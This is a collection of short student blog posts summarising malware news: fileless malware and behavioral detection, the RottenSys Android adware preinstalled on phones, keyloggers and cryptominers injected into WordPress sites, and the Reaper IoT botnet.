The Rise of Fileless malware

Over the last two years, there has been an uptick in the amount the malware attacks that are fileless. This means that the malware is designed to not rely on or interacts with the filesystem of the host machine. This is so it is relatively undetectable by file scanning, which is the common way to find malware. This rising trend will change how we deal with these kind of malware threats. One of the changes to combat this threat is to turn to behavior based detection strategies like “script block logging,” which will keep track of code that is executed, for someone to sift through and look for abnormalities.

Experts are predicting that fileless malware attacks will continue to rise as it did from 2016 to 2017 because of its success rate. Fileless attacks are more likely to be successful than file-based attacks by an order of magnitude (literally 10 times more likely), according to the 2017 “State of Endpoint Security Risk” report from Ponemon. The ratio of fileless to file-based attacks grew in 2017 and is forecasted to continue to do grow this year. This goes to show that we need to constantly be adapting to different threats, because we know the hackers will.
– Ryne Krueger



Fileless Malware

Malware is constantly evolving to match the level of sophistication that anti-malware programs use to prevent it. This is especially so in the type of malware called fileless malware. This malware is relatively new (first big cases seen in 2014) but becoming more common. Fileless malware tends to avoid the filesystem by operating almost entirely in memory, therefore we have also seen some attacks like this as early as in the 2000’s. It hit a milestone in 2017 of attacks by making up nearly 52% of all malware attacks that year.

This type of malware aims to avoid modifying the filesystem at all. It allows “cybercriminals to skip steps that are needed to deploy malware-based attacks, such as creating payloads with malware to drop onto users’ systems. Instead, attackers use trusted programs native to the operating system and native operating system tools like PowerShell and WMI to exploit in-memory access, as well as Web browsers and Office applications.”

So why does it matter if it avoids modifying the filesystem? That is because a big part of malware protection in anti-malware programs is scanning files to detect infected ones.

How can it be prevented? This is a process called behavioral detection. “Looking for signs associated with malicious PowerShell use (like a PowerShell session executed using an encoded command via the command line), provides security teams with the evidence they need to investigate incidents that could turn out to be instances of malicious PowerShell use.”


-Dylan Arrabito

Pre-Installed Malware Found on Nearly 5 Million Android Devices

A malware referred to as RottenSys has been discovered to have infected nearly 5 million devices since 2016. It is possible that the malware could have been installed on older devices as well.

Check Point Software Technologies, the company that discovered the infections, found that 49.2% of the infected devices had been shipped through Tian Pai, a Hangzhou based mobile phone distributor. At this point, it is not clear if Tian Pai is directly involved or not. The manufacturers that have been affected are Honor, Huawei, Xiaomi, OPPO, Vivo, Samsung and GIONEE.

The malware is disguised as a System Wi-Fi service app that has no malicious code and doesn’t initially perform any malicious activity, in order to go unnoticed. After a set amount of time, the program communicates with its Command and Controller (C&C) server to download the components required for its activity. RottenSys then is able to use multiple open-source Android frameworks to ensure the continued functionality of the RottenSys and to feed advertisements to the user. From March third to March twelfth, the malware had generated over $115,000 in ad-click revenue.

It is unclear what the developers of RottenSys plan to use their massive botnet for besides aggressively serving people ads, but they do have the ability to send any code they want to the infected phones. This means they would be able to have the phones participate in large-scale botnet attacks.

In order to remove the malware from a device, a user has to remove four separate packages.

Package Name App Name 每日黄历
com.changmi.launcher 畅米桌面 系统WIFI服务

There is nothing that consumers are able to do to prevent an attack of this nature from occurring. The only thing we can do is be extremely paranoid about the applications that come pre-installed on our phones. We need to check the permissions that the applications request and determine if the permission is something that the application should need. Of course, this is not a reasonable thing to ask of most people to do, and so most people are left at the mercy of the industry to keep their devices safe.

– Zachary Campanella


Keyloggers and cryptocurrency mining on infected wordpress sites

About four weeks ago, (a little after the start of this class….. 🤔) it was discovered that thousands of WordPress sites were being used to mine Monero cryptocurrency, along with using a keylogger users’ login information, and possibly more. It functioned in such a way that users didn’t even have to hit the submit button in order to have their credentials stolen, and mining would start simply by visiting the page.

The keylogger runs on the entirety of the infected site, which opens the door for more than just WordPress logins to be captured, but also any data passed through the infected websites, such as possible bank credentials and e-mail addresses.

According to Bleeping Computer, 2,000 sites were infected by the keylogger. There’s no real way to tell if you are visiting an infected site without inspecting the source (and knowing what you’re looking for), so until the virus is wiped out, people should be wary of any WordPress managed site. If your browser suddenly starts eating up processing power when visiting a WordPress site, there is a good chance you’ve visited an infected one, and your computer is being used to mine Monero while you visit it.

Security experts still aren’t sure what caused the vulnerability aside from a blanket “WordPress is just bad”, and “this happens all the time to WordPress.”
Security experts are backing up their claims of WordPress’s dismal security practices by pointing out that within the past two months another entirely different keylogger was found infecting WordPress that infected 5,482 sites.
This entirely seperate keylogger was injected into Cloudflare scripts that used fake linter.js urls.

If the site has this malware running on it, there also is a chance that it also is using your computer to do cryptocurrency mining, but instead of mining only for Monero, this malware can mine whatever cryptocurrency the hacker so decides.

WordPress is so prone to hacking that there is a monthly journal to keep track of what wordpress vulnerabilities were found. Though it is hard to keep 18.9% of the internet running safely, and though it is easy to blame wordpress for not handling these attacks, part of the responsibility does lie with the admins of the pages.
However, the fact that wordpress seems to be this insecure just shows the kind of caution you need when going anywhere online.

-Skyler Clark

Reaper Botnet Dwarfs Mirai


By this point everyone and their mother has heard of the botnet dubbed ‘Mirai’, an infamous botnet infrastructure from last year that managed to take down a good chunk of the internet by attacking Dyn, a DNS provider. Well as of this September, weak passwords might have become the least of your worries if you’re like 60% of Check Point’s ThreatCloud covered corporations, and have un-patched vulnerabilities on your network.

Dubbed Reaper, or IOTroop by some, a new IoT botnet is propagating, and shows no sign of slowing down. Today, researchers have ruled out the possibility that Mirai and Reaper are connected, at least on a technical level, due to the superiority that Reaper has displayed in its intrusion and propagation techniques. Whereas Mirai was spread through the exploitation of default passwords across IoT devices, Reaper utilizes a specialized strand of malware that exploits well known vulnerabilities (such as those present in many printers and IoT toasters) to gain entry to a device, and further uses that device to spread itself to others connected.

With near exponential growth, Qihoo 360 Netlab witnessed approximately 2 million newly infected devices waiting to be processed by a C&C server, of which there are several that have thus been identified. The best thing that any concerned corporation or user can do at this point in time, would be to ensure that every machine on their network has updated firmware, and software in an attempt to limit the spread of this variable plague infecting IoT networks worldwide.

Currently, it appears as if we all might be witnessing a ‘calm before the storm’, situation, with this botnet ramping up massively in numbers and, according to Check Point, updating its capabilities on a daily basis. What else can I say but stay safe, and brace for impact, as when this thing hits, it’ll make the Dyn attack look like a birthday party.

– Kenneth Nero

Sources: Here, and Here, also Here